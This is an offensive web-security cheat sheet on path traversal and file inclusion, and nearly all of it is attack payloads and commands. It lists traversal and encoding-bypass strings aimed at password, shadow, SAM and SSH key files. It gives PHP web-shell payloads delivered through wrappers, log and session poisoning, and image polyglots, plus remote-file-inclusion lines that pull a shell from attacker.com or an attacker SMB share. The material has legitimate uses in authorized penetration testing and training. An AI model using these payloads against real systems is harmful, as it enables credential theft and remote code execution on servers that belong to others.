Exploitation A01 | Broken Access Control A03 | Injection

Path Traversal & File Inclusion

Path traversal (directory traversal) and file inclusion vulnerabilities allow attackers to read arbitrary files or execute code by manipulating file paths in web applications. This guide covers LFI, RFI, and advanced exploitation techniques.

Why Path Traversal Matters

Path traversal can expose sensitive configuration files, credentials, and source code. LFI can escalate to RCE through log poisoning, PHP wrappers, or proc exploitation. RFI directly enables code execution by including remote malicious files.

Danger

File inclusion attacks can lead to sensitive data exposure and remote code execution. Always ensure you have proper authorization before testing.

Tools & Resources

dotdotpwn

Directory traversal fuzzer

apt install dotdotpwn GitHub →

LFISuite

Automated LFI exploitation

git clone LFISuite GitHub →

ffuf

Fast web fuzzer for LFI testing

apt install ffuf GitHub →

Kadimus

LFI scanner and exploiter

git clone kadimus GitHub →

Burp Suite

Manual path traversal testing

portswigger.net Website →

SecLists LFI

LFI wordlists and payloads

Fuzzing/LFI/ GitHub →

Understanding Path Traversal

Path traversal occurs when an application uses user input to construct file paths without proper validation. Attackers use sequences like ../ to navigate outside the intended directory.

Vulnerability Types

Path Traversal

Read files outside webroot using ../ sequences

LFI (Local File Inclusion)

Include and execute local files (PHP specific)

RFI (Remote File Inclusion)

Include and execute files from remote servers

Basic Path Traversal

Common Payloads

traversal-payloads.txt

plaintext

# Basic traversal
../../../etc/passwd
..\..\..\windows\win.ini

# Absolute path (if allowed)
/etc/passwd
C:\windows\win.ini

# URL encoded
..%2f..%2f..%2fetc%2fpasswd
..%252f..%252f..%252fetc%252fpasswd (double encoding)

# Null byte (PHP < 5.3.4)
../../../etc/passwd%00
../../../etc/passwd%00.jpg

# Path truncation (Windows)
..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\etc/passwd

Interesting Files to Read

Linux Files

linux-files.txt

plaintext

/etc/passwd
/etc/shadow
/etc/hosts
/etc/hostname
/etc/issue
/etc/group
/etc/crontab
/etc/ssh/sshd_config
/proc/self/environ
/proc/self/cmdline
/proc/version
/var/log/apache2/access.log
/var/log/apache2/error.log
/var/log/auth.log
/var/log/syslog
/home/user/.bash_history
/home/user/.ssh/id_rsa
/root/.bash_history

Windows Files

windows-files.txt

plaintext

C:\windows\win.ini
C:\windows\system32\config\sam
C:\windows\system32\config\system
C:\windows\system32\config\security
C:\windows\repair\sam
C:\windows\repair\system
C:\windows\php.ini
C:\xampp\apache\conf\httpd.conf
C:\xampp\php\php.ini
C:\inetpub\wwwroot\web.config
C:\inetpub\logs\LogFiles\
C:\Users\Administrator\.ssh\id_rsa
C:\Program Files\MySQL\my.ini

Application-Specific Files

app-files.txt

plaintext

# Web application configs
.htaccess
.htpasswd
wp-config.php
config.php
configuration.php
database.yml
settings.py
.env
.git/config
composer.json
package.json

# Framework specific
# Laravel
../storage/logs/laravel.log
../.env

# WordPress
../wp-config.php

# Drupal
../sites/default/settings.php

# Tomcat
../conf/tomcat-users.xml
../conf/server.xml

Filter Bypass Techniques

Encoding Bypasses

encoding-bypass.txt

plaintext

# URL encoding
%2e%2e%2f = ../
%2e%2e/ = ../
..%2f = ../
%2e%2e%5c = ..\

# Double URL encoding
%252e%252e%252f = ../
..%252f = ../

# 16-bit Unicode encoding
%u002e%u002e%u002f = ../
..%u002f = ../

# Overlong UTF-8 encoding
%c0%ae%c0%ae%c0%af = ../
%e0%80%ae%e0%80%ae%e0%80%af = ../

# Mixed encoding
..%c0%af = ../
..%ef%bc%8f = ../

Path Normalization Bypasses

normalization-bypass.txt

plaintext

# Doubled slashes
....//....//....//etc/passwd
....//../....//../....//../etc/passwd

# Backslash variations (Windows)
..\..\..\..\etc/passwd
....\\....\\....\\etc/passwd

# Mixed separators
../..\..//..\etc/passwd

# Current directory bypass
./../.../....//etc/passwd
./../.././../.././../../etc/passwd

# Adding extra characters
..;/..;/..;/etc/passwd
..%00/..%00/..%00/etc/passwd

Extension Bypass

extension-bypass.txt

plaintext

# Null byte (PHP < 5.3.4)
../../../etc/passwd%00.jpg
../../../etc/passwd%00.png
../../../etc/passwd\0.txt

# Path truncation (Windows, long paths)
../../../etc/passwd............[ADD MORE DOTS TO 256+ CHARS]

# Double extension
../../../etc/passwd.jpg
../../../etc/passwd%00.expected.ext

# Query string termination
../../../etc/passwd?.jpg
../../../etc/passwd#.jpg

Local File Inclusion (LFI)

LFI goes beyond simple file reading - in PHP applications, included files are executed as PHP code, enabling various RCE techniques.

PHP Wrappers

php-wrappers.txt

plaintext

# Base64 encode file (read source code)
php://filter/convert.base64-encode/resource=index.php
php://filter/read=convert.base64-encode/resource=config.php

# Read with different filters
php://filter/read=string.rot13/resource=index.php
php://filter/zlib.deflate/convert.base64-encode/resource=index.php

# Data wrapper (RCE if allow_url_include=On)
data://text/plain,<?php system($_GET['cmd']); ?>
data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Pz4=

# Expect wrapper (RCE if expect:// installed)
expect://id
expect://ls

# Input wrapper (POST data as file content)
php://input
# POST: <?php system($_GET['cmd']); ?>

# Phar wrapper
phar://uploads/avatar.jpg/shell.php

Log Poisoning

log-poisoning.sh

bash

# Step 1: Poison Apache access log via User-Agent
curl "http://target.com/" -A "<?php system($_GET['cmd']); ?>"

# Step 2: Include the log file
?page=../../../var/log/apache2/access.log&cmd=id

# Alternative log locations
/var/log/apache2/access.log
/var/log/apache/access.log
/var/log/httpd/access_log
/var/log/nginx/access.log
/var/log/auth.log (SSH log - use username as payload)
/var/log/mail.log
/proc/self/environ (inject via User-Agent header)
/proc/self/fd/0-99 (file descriptors)

/proc/self/environ Poisoning

proc-environ.sh

bash

# Step 1: Inject payload in User-Agent
curl "http://target.com/index.php?page=../../../proc/self/environ" \
  -A "<?php system($_GET['cmd']); ?>"

# Step 2: Access with command
curl "http://target.com/index.php?page=../../../proc/self/environ&cmd=id"

# The User-Agent appears in HTTP_USER_AGENT environment variable

Session File Inclusion

session-inclusion.sh

bash

# Step 1: Create session with PHP code
# Access: index.php?name=<?php system($_GET['cmd']); ?>
# This stores payload in session

# Step 2: Find session file location
/var/lib/php/sessions/sess_[SESSIONID]
/var/lib/php5/sessions/sess_[SESSIONID]
/tmp/sess_[SESSIONID]
C:\Windows\Temp\sess_[SESSIONID]

# Step 3: Include session file
?page=../../../var/lib/php/sessions/sess_abc123&cmd=id

# Get session ID from cookie
# Cookie: PHPSESSID=abc123

Upload + LFI Combo

upload-lfi.sh

bash

# Step 1: Upload image with PHP code in EXIF
exiftool -Comment='<?php system($_GET["cmd"]); ?>' image.jpg

# Or create polyglot
# Create GIF89a header with PHP code appended
echo -e 'GIF89a<?php system($_GET["cmd"]); ?>' > shell.gif

# Step 2: Upload as avatar/image

# Step 3: Include via LFI
?page=../../../uploads/avatars/shell.gif&cmd=id
?page=../../../uploads/image.jpg&cmd=id

Remote File Inclusion (RFI)

Warning

RFI requires allow_url_include = On in PHP, which is disabled by default in modern PHP versions. It's still common in legacy applications.

Basic RFI Exploitation

rfi-basic.sh

bash

# Host malicious PHP file on attacker server
# shell.txt (use .txt to avoid local execution)
<?php system($_GET['cmd']); ?>

# Include remote file
?page=http://attacker.com/shell.txt
?page=http://attacker.com/shell.txt?
?page=http://attacker.com/shell.txt%00

# Bypass extension filtering
?page=http://attacker.com/shell.txt?.php
?page=http://attacker.com/shell.txt%00.php

# Using data URI
?page=data://text/plain,<?php system($_GET['cmd']); ?>

RFI via SMB (Windows)

rfi-smb.sh

bash

# Set up SMB share on attacker machine
# Using Impacket smbserver
python smbserver.py share /path/to/share

# shell.php on SMB share
<?php system($_GET['cmd']); ?>

# Include via UNC path
?page=\\attacker-ip\share\shell.php
?page=//attacker-ip/share/shell.php

LFI to RCE Techniques

LFI2RCE Methods Summary

Method	Requirements
Log Poisoning	Read access to log files
PHP Wrappers (data://)	allow_url_include=On
PHP Wrappers (expect://)	expect extension installed
php://input	allow_url_include=On
Session Inclusion	Session storage accessible
/proc/self/environ	Linux, readable proc filesystem
Upload + Include	File upload functionality
phpinfo() + Race	phpinfo() page accessible
Phar Deserialization	Upload + vulnerable unserialize

PHP Filter Chain RCE

filter-chain.sh

bash

# PHP filter chain for arbitrary file content (no file upload needed!)
# This technique abuses iconv filters to generate arbitrary content
# Tool: https://github.com/synacktiv/php_filter_chain_generator

python php_filter_chain_generator.py --chain '<?php system($_GET["cmd"]);?>'

# Output is a very long filter chain that generates the PHP code
# Example usage:
?page=php://filter/convert.iconv...[LONG CHAIN].../resource=/etc/passwd&cmd=id

Automated Testing

Using ffuf

ffuf-lfi.sh

bash

# Fuzz for LFI with common payloads
ffuf -u "http://target.com/index.php?page=FUZZ" \
  -w /usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt \
  -fs 0

# Test multiple parameters
ffuf -u "http://target.com/index.php?FUZZ=../../../etc/passwd" \
  -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt \
  -fs 0

# With encoding
ffuf -u "http://target.com/index.php?page=FUZZ" \
  -w lfi-payloads.txt \
  -e .php,.txt,.html \
  -fs 0

Using dotdotpwn

dotdotpwn-usage.sh

bash

# HTTP module
dotdotpwn -m http -h target.com -x 80 -f /etc/passwd -k "root:" -d 8

# HTTP with specific URL
dotdotpwn -m http-url -u "http://target.com/view.php?file=TRAVERSAL" \
  -k "root:" -d 8

# Options:
# -d: depth of traversal
# -k: keyword to detect success
# -f: file to read
# -o: output file